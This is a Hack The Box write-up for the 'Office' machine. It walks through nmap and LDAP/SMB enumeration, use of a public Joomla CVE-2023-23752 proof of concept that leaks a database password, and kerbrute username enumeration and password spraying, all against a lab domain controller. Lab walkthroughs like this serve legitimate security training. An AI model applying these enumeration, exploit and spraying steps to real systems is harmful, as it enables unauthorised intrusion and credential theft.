# Office - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Office is a good, hard-rated Windows machine created by [0rii](https://app.hackthebox.com/users/169229)

The foothold involves brute-forcing usernames with a colossal wordlist, AS-REProasting, and retrieving a password from Kerberos pre-authentication packets.  
Afterwards, malicious LibreOffice documents have to be used for pivoting.  
The root involves decrypting DPAPI masterkeys without credentials and GPO abuse.

## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.3
Nmap scan report for 10.10.11.3
Host is up (0.18s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49669/tcp open  unknown
49681/tcp open  unknown
56428/tcp open  unknown
56444/tcp open  unknown
63216/tcp open  unknown
```

```console
opcode@debian$ nmap -sC -sV -p 53,80,88,139,389,443,445,593,636,3268,3269,5985,9389,49664,49669,49681,56428,56444,63216 -oN office.nmap 10.10.11.3
Nmap scan report for 10.10.11.3
Host is up (0.17s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/ 
| /cache/ /cli/ /components/ /includes/ /installation/ 
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-18 03:13:36Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
443/tcp   open  ssl/http      Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_http-title: 403 Forbidden
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
56428/tcp open  msrpc         Microsoft Windows RPC
56444/tcp open  msrpc         Microsoft Windows RPC
63216/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: DC, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m59s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-02-18T03:14:28
|_  start_date: N/A
```

DNS, Kerberos, SMB, RPC, LDAP, WinRM, and other ports are open. It is likely a DC.  
We can start with LDAP enumeration:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.11.3 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=office,DC=htb
ldapServiceName: office.htb:dc$@OFFICE.HTB
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=office,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=office,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=office,DC=htb
namingContexts: DC=office,DC=htb
namingContexts: CN=Configuration,DC=office,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=office,DC=htb
namingContexts: DC=DomainDnsZones,DC=office,DC=htb
namingContexts: DC=ForestDnsZones,DC=office,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 262286
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=office,DC=htb
dnsHostName: DC.office.htb
defaultNamingContext: DC=office,DC=htb
currentTime: 20240218031457.0Z
configurationNamingContext: CN=Configuration,DC=office,DC=htb
```

Since the dnsHostName is set to FQDN `DC.office.htb`, we can add it to `/etc/hosts`:

```text
10.10.11.3 DC.office.htb office.htb DC
```

## SMB enumeration

I prefer [NetExec](https://github.com/Pennyw0rth/NetExec) to enumerate SMB:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@6bf4af05914d:~# echo '10.10.11.3 DC.office.htb office.htb DC' >> /etc/hosts
```

Null sessions are disabled:

```console
root@6bf4af05914d:~# nxc smb 10.10.11.3 -d office.htb -u '' -p '' --shares
SMB         10.10.11.3   445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3   445    DC               [-] office.htb\: STATUS_ACCESS_DENIED
SMB         10.10.11.3   445    DC               [-] Error getting user: list index out of range
SMB         10.10.11.3   445    DC               [-] Error enumerating shares: Error occurs while reading from remote(104)
```

Guest sessions are also disabled:

```console
root@6bf4af05914d:~# nxc smb 10.10.11.3 -d office.htb -u 'opcode' -p '' --shares
SMB         10.10.11.3   445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3   445    DC               [-] office.htb\opcode: STATUS_LOGON_FAILURE
```

I also ran [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) for `rpcclient` enumeration, but it wasn't helpful.

## Joomla CMS enumeration

<https://office.htb/> returns 403 forbidden and <http://office.htb/> returns a Joomla instance.

![1](images/1.png)

`admin:admin`, `joomla:joomla` or `admin:joomla` did not work on login forms, neither on the blog nor on `/administrator`.  
I also tested for SQLi:

```console
opcode@debian$ sqlmap -r login.req --batch
```

The URLs for articles were of form <http://office.htb/index.php?view=article&id=4&catid=8>. I wanted to test for injections but got blocked by WAF.  
From <http://office.htb/administrator/manifests/files/joomla.xml> the version can be discerned to be 4.2.7  
It has a file disclosure vulnerability; I found a PoC at <https://github.com/ifacker/CVE-2023-23752-Joomla>

```console
opcode@debian$ python3 main.py -u http://office.htb/
[+] [Database]   http://office.htb/api/index.php/v1/config/application?public=true --> root / H0lOgrams4reTakIng0Ver754!
```

The obtained credentials did not work on the login forms or active directory.  
I also tried [joomscan](https://github.com/OWASP/joomscan):

```console
opcode@debian$ git clone https://github.com/rezasp/joomscan.git
opcode@debian$ cd joomscan
opcode@debian$ perl joomscan.pl -u http://office.htb/
    ____  _____  _____  __  __  ___   ___    __    _  _ 
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  ( 
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
            (1337.today)
   
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://office.htb/ ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 4.2.7

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing : 
http://office.htb/administrator/components
http://office.htb/administrator/modules
http://office.htb/administrator/templates
http://office.htb/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://office.htb/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://office.htb/robots.txt 

Interesting path found from robots.txt
http://office.htb/joomla/administrator/
http://office.htb/administrator/
http://office.htb/api/
http://office.htb/bin/
http://office.htb/cache/
http://office.htb/cli/
http://office.htb/components/
http://office.htb/includes/
http://office.htb/installation/
http://office.htb/language/
http://office.htb/layouts/
http://office.htb/libraries/
http://office.htb/logs/
http://office.htb/modules/
http://office.htb/plugins/
http://office.htb/tmp/


[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found
```

## Username brute-force

On the website, the blog posts are written by `Tony Stark`  
With [username-anarchy](https://github.com/urbanadventurer/username-anarchy), a list of potential usernames can be generated:

```console
opcode@debian$ git clone https://github.com/urbanadventurer/username-anarchy.git
opcode@debian$ cd username-anarchy
opcode@debian$ ./username-anarchy Tony Stark > ~/usernames.txt
```

Now, [kerbrute](https://github.com/ropnop/kerbrute) can be used to validate:

```console
opcode@debian$ kerbrute userenum ~/usernames.txt --dc 10.10.11.3 -d office.htb

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/18/24 - Ronnie Flathers @ropnop

2024/02/18 01:53:41 >  Using KDC(s):
2024/02/18 01:53:41 >   10.10.11.3:88

2024/02/18 01:53:41 >  [+] VALID USERNAME:   tstark@office.htb
2024/02/18 01:53:42 >  Done! Tested 14 usernames (1 valid) in 0.359 seconds
```

But the password did not work for him:

```console
opcode@debian$ sudo ntpdate office.htb
opcode@debian$ echo tstark | kerbrute passwordspray --dc 10.10.11.3 -d office.htb - 'H0lOgrams4reTakIng0Ver754!' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/18/24 - Ronnie Flathers @ropnop

2024/02/18 01:55:17 >  Using KDC(s):
2024/02/18 01:55:17 >   10.10.11.3:88

2024/02/18 01:55:18 >  [!] tstark@office.htb:H0lOgrams4reTakIng0Ver754! - Invalid password
2024/02/18 01:55:18 >  Done! Tested 1 logins (0 successes) in 0.384 seconds
```

The account was not AS-REProastable either:

```console
opcode@debian$ echo 'tstark' > usernames.txt
opcode@debian$ GetNPUsers.py office.htb/ -usersfile usernames.txt
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[-] User tstark doesn't have UF_DONT_REQUIRE_PREAUTH set
```

I asked a friend for a hint and learnt that the first step is to find a username wordlist.  
Guessing that the author has themed it around Iron Man, I created a word list of all characters from Iron Man comics.  
To generate the wordlist, I used the [Marvel API](https://developer.marvel.com/docs)

To use the API, I registered an account and obtained an API key (also my public key): `xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx` and my private key: `yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy` from <https://developer.marvel.com/account>  
Other than the API key, we also need a timestamp and `md5(timestamp+privatekey+publickey)`

```console
opcode@debian$ date +%s                            
1708312628

opcode@debian$ python3 -c "print(__import__('hashlib').md5(b'1708312628yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx').hexdigest())"
34c0a5e51854c9fd1352e28f169c22f4
```

Getting the list of all Iron Man comics:

```console
opcode@debian$ curl 'http://gateway.marvel.com/v1/public/comics?ts=1708312628&apikey=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&hash=34c0a5e51854c9fd1352e28f169c22f4&titleStartsWith=iron%20man&limit=100' | jq '.data.results[].id' >> comic_id.txt
opcode@debian$ curl 'http://gateway.marvel.com/v1/public/comics?ts=1708312628&apikey=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&hash=34c0a5e51854c9fd1352e28f169c22f4&titleStartsWith=iron%20man&limit=100&offset=100' | jq '.data.results[].id' >> comic_id.txt
opcode@debian$ curl 'http://gateway.marvel.com/v1/public/comics?ts=1708312628&apikey=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&hash=34c0a5e51854c9fd1352e28f169c22f4&titleStartsWith=iron%20man&limit=100&offset=200' | jq '.data.results[].id' >> comic_id.txt
[--SNIP--]
opcode@debian$ curl 'http://gateway.marvel.com/v1/public/comics?ts=1708312628&apikey=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&hash=34c0a5e51854c9fd1352e28f169c22f4&titleStartsWith=iron%20man&limit=100&offset=900' | jq '.data.results[].id' >> comic_id.txt
```

It was a slow process. The API limits the result to 100 entries. There were 900+ Iron Man comics.  
The next step was to get the list of characters from them. But the API was once again the bottleneck. I could query the `/characters` endpoint with a comic ID, but it only allows simultaneous querying with 10 comic IDs. On top of that, the response is limited to 100 characters at once.  
The most frustrating part is that character aliases are absent in the API.

Therefore, a Python script was in order: [ironman_characters.py](ironman_characters.py)  
To get a comma-separated list of all comic IDs, I used `paste -sd ',' comic_id.txt`

```console
opcode@debian$ python3 ironman_characters.py
```

I ended up with [characters.json](characters.json)  
At the end, the headcount came out to only 179:

```console
opcode@debian$ jq length characters.json                                       
179
```

And more than half of them have superhero or villain names that I won't add to the list. I used the description to manually note down their names in a separate text file: [characters.txt](characters.txt) (67 names)  
We alredy know the account naming convention since `tstark` was a valid username.

```console
opcode@debian$ ./username-anarchy -i ~/characters.txt -f flast > ~/usernames.txt
```

```console
opcode@debian$ sudo ntpdate office.htb
opcode@debian$ kerbrute userenum ~/usernames.txt --dc 10.10.11.3 -d office.htb

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/25/24 - Ronnie Flathers @ropnop

2024/02/19 21:01:32 >  Using KDC(s):
2024/02/19 21:01:32 >   10.10.11.3:88

2024/02/19 21:01:38 >  [+] VALID USERNAME:   hhogan@office.htb
2024/02/19 21:01:38 >  [+] VALID USERNAME:   ppotts@office.htb
2024/02/19 21:01:44 >  [+] VALID USERNAME:   tstark@office.htb
2024/02/19 21:01:44 >  Done! Tested 65 usernames (3 valid) in 12.557 seconds
```

We can test if one of them reuses the database password:

```console
opcode@debian$ echo -e 'hhogan\nppotts\ntstark' > usernames.txt
opcode@debian$ kerbrute passwordspray --dc 10.10.11.3 -d office.htb ~/usernames.txt 'H0lOgrams4reTakIng0Ver754!' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/25/24 - Ronnie Flathers @ropnop

2024/02/19 21:05:42 >  Using KDC(s):
2024/02/19 21:05:42 >   10.10.11.3:88

2024/02/19 21:05:43 >  [!] tstark@office.htb:H0lOgrams4reTakIng0Ver754! - Invalid password
2024/02/19 21:05:43 >  [!] ppotts@office.htb:H0lOgrams4reTakIng0Ver754! - Invalid password
2024/02/19 21:05:43 >  [!] hhogan@office.htb:H0lOgrams4reTakIng0Ver754! - Invalid password
2024/02/19 21:05:43 >  Done! Tested 3 logins (0 successes) in 0.512 seconds
```

They all failed. I asked my friend for help again, and he pointed me to the [xato-net-10-million-usernames-dup.txt](https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames-dup.txt) wordlist.  
It feels weird to be using a random wordlist in a CTF, but I'll live.

```console
opcode@debian$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/xato-net-10-million-usernames-dup.txt
opcode@debian$ sudo ntpdate office.htb
opcode@debian$ kerbrute userenum ~/xato-net-10-million-usernames-dup.txt --dc 10.10.11.3 -d office.htb -t 25
```

I let it run with 25 threads for 15 minutes, and very few usernames were found. It might take more than an hour for the wordlist to finish.  
I asked my friend for the relevant username and received `dwolfe`

```console
opcode@debian$ echo dwolfe | kerbrute passwordspray --dc 10.10.11.3 -d office.htb - 'H0lOgrams4reTakIng0Ver754!' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/25/24 - Ronnie Flathers @ropnop

2024/02/19 22:28:43 >  Using KDC(s):
2024/02/19 22:28:43 >   10.10.11.3:88

2024/02/19 22:28:44 >  [+] VALID LOGIN:  dwolfe@office.htb:H0lOgrams4reTakIng0Ver754!
2024/02/19 22:28:44 >  Done! Tested 1 logins (1 successes) in 0.880 seconds
```

Therefore, we have a valid set of credentials:

```text
dwolfe:H0lOgrams4reTakIng0Ver754!
```

## Post-credential AD enumeration

Now that we have a set of credentials, we can enumerate more.  
Starting with SMB shares:

```console
root@6bf4af05914d:~# nxc smb 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' --shares
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3      445    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 
SMB         10.10.11.3      445    DC               [*] Enumerated shares
SMB         10.10.11.3      445    DC               Share           Permissions     Remark
SMB         10.10.11.3      445    DC               -----           -----------     ------
SMB         10.10.11.3      445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.3      445    DC               C$                              Default share
SMB         10.10.11.3      445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.3      445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.3      445    DC               SOC Analysis    READ            
SMB         10.10.11.3      445    DC               SYSVOL          READ            Logon server share 
```

We'd have to look into the `SOC Analysis` share.

RID cycling:

```console
root@6bf4af05914d:~# nxc smb 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' --rid-brute 10000
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3      445    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 
SMB         10.10.11.3      445    DC               498: OFFICE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.3      445    DC               500: OFFICE\Administrator (SidTypeUser)
SMB         10.10.11.3      445    DC               501: OFFICE\Guest (SidTypeUser)
SMB         10.10.11.3      445    DC               502: OFFICE\krbtgt (SidTypeUser)
SMB         10.10.11.3      445    DC               512: OFFICE\Domain Admins (SidTypeGroup)
SMB         10.10.11.3      445    DC               513: OFFICE\Domain Users (SidTypeGroup)
SMB         10.10.11.3      445    DC               514: OFFICE\Domain Guests (SidTypeGroup)
SMB         10.10.11.3      445    DC               515: OFFICE\Domain Computers (SidTypeGroup)
SMB         10.10.11.3      445    DC               516: OFFICE\Domain Controllers (SidTypeGroup)
SMB         10.10.11.3      445    DC               517: OFFICE\Cert Publishers (SidTypeAlias)
SMB         10.10.11.3      445    DC               518: OFFICE\Schema Admins (SidTypeGroup)
SMB         10.10.11.3      445    DC               519: OFFICE\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.3      445    DC               520: OFFICE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.3      445    DC               521: OFFICE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.3      445    DC               522: OFFICE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.3      445    DC               525: OFFICE\Protected Users (SidTypeGroup)
SMB         10.10.11.3      445    DC               526: OFFICE\Key Admins (SidTypeGroup)
SMB         10.10.11.3      445    DC               527: OFFICE\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.3      445    DC               553: OFFICE\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.3      445    DC               571: OFFICE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.3      445    DC               572: OFFICE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.3      445    DC               1000: OFFICE\DC$ (SidTypeUser)
SMB         10.10.11.3      445    DC               1101: OFFICE\DnsAdmins (SidTypeAlias)
SMB         10.10.11.3      445    DC               1102: OFFICE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.3      445    DC               1106: OFFICE\Registry Editors (SidTypeGroup)
SMB         10.10.11.3      445    DC               1107: OFFICE\PPotts (SidTypeUser)
SMB         10.10.11.3      445    DC               1108: OFFICE\HHogan (SidTypeUser)
SMB         10.10.11.3      445    DC               1109: OFFICE\EWhite (SidTypeUser)
SMB         10.10.11.3      445    DC               1110: OFFICE\etower (SidTypeUser)
SMB         10.10.11.3      445    DC               1111: OFFICE\dwolfe (SidTypeUser)
SMB         10.10.11.3      445    DC               1112: OFFICE\dmichael (SidTypeUser)
SMB         10.10.11.3      445    DC               1113: OFFICE\dlanor (SidTypeUser)
SMB         10.10.11.3      445    DC               1114: OFFICE\tstark (SidTypeUser)
SMB         10.10.11.3      445    DC               1117: OFFICE\GPO Managers (SidTypeGroup)
SMB         10.10.11.3      445    DC               1118: OFFICE\web_account (SidTypeUser)
```

I also check a few other modules:

```console
root@6bf4af05914d:~# nxc smb 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -M enum_av
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3      445    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 
ENUM_AV     10.10.11.3      445    DC               Found NOTHING!

root@6bf4af05914d:~# nxc ldap 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -M adcs
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.3      636    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 
ADCS        10.10.11.3      389    DC               [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

root@6bf4af05914d:~# nxc ldap 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -M MAQ
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.3      636    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 
MAQ         10.10.11.3      389    DC               [*] Getting the MachineAccountQuota
MAQ         10.10.11.3      389    DC               MachineAccountQuota: 10

root@6bf4af05914d:~# nxc ldap 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -M whoami
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.3      636    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 
WHOAMI      10.10.11.3      389    DC               distinguishedName: CN=dwolfe,CN=Users,DC=office,DC=htb
WHOAMI      10.10.11.3      389    DC               name: dwolfe
WHOAMI      10.10.11.3      389    DC               Enabled: Yes
WHOAMI      10.10.11.3      389    DC               Password Never Expires: Yes
WHOAMI      10.10.11.3      389    DC               Last logon: 133638083240533684
WHOAMI      10.10.11.3      389    DC               pwdLastSet: 133279781944450664
WHOAMI      10.10.11.3      389    DC               logonCount: 2
WHOAMI      10.10.11.3      389    DC               sAMAccountName: dwolfe
```

And some groups:

```console
root@6bf4af05914d:~# nxc ldap 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -M group-mem -o group='Remote Management Users'
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.3      636    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 
GROUP-ME... 10.10.11.3      389    DC               [+] Found the following members of the Remote Management Users group:
GROUP-ME... 10.10.11.3      389    DC               HHogan

root@6bf4af05914d:~# nxc ldap 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -M group-mem -o group='Remote Desktop Users'
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.3      636    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 

root@6bf4af05914d:~# nxc ldap 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -M group-mem -o group='Administrators'
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.3      636    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 
GROUP-ME... 10.10.11.3      389    DC               [+] Found the following members of the Administrators group:
GROUP-ME... 10.10.11.3      389    DC               Administrator
GROUP-ME... 10.10.11.3      389    DC               Enterprise Admins
GROUP-ME... 10.10.11.3      389    DC               Domain Admins

root@6bf4af05914d:~# nxc ldap 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -M group-mem -o group='Protected Users'
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.3      636    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 

root@6bf4af05914d:~# nxc ldap 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -M group-mem -o group='Domain Computers'
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.3      636    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 

root@6bf4af05914d:~# nxc ldap 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -M group-mem -o group='Registry Editors'
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.3      636    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 
GROUP-ME... 10.10.11.3      389    DC               [+] Found the following members of the Registry Editors group:
GROUP-ME... 10.10.11.3      389    DC               PPotts
GROUP-ME... 10.10.11.3      389    DC               tstark

root@6bf4af05914d:~# nxc ldap 10.10.11.3 -d office.htb -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -M group-mem -o group='GPO Managers'
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.3      636    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 
GROUP-ME... 10.10.11.3      389    DC               [+] Found the following members of the GPO Managers group:
GROUP-ME... 10.10.11.3      389    DC               HHogan
```

`HHogan` is present in the `Remote Management Users` group and the `GPO Managers` group.  
`PPotts` and `tstark` are in the `Registry Editors` group.  
I collected Bloodhound data to discover possible paths, but it led nowhere.

We need to look into the `SOC Analysis` SMB share.  
I decided to use [smbclient-ng](https://github.com/p0dalirius/smbclient-ng)

```console
opcode@debian$ python3 -m pip install smbclientng --break-system-packages
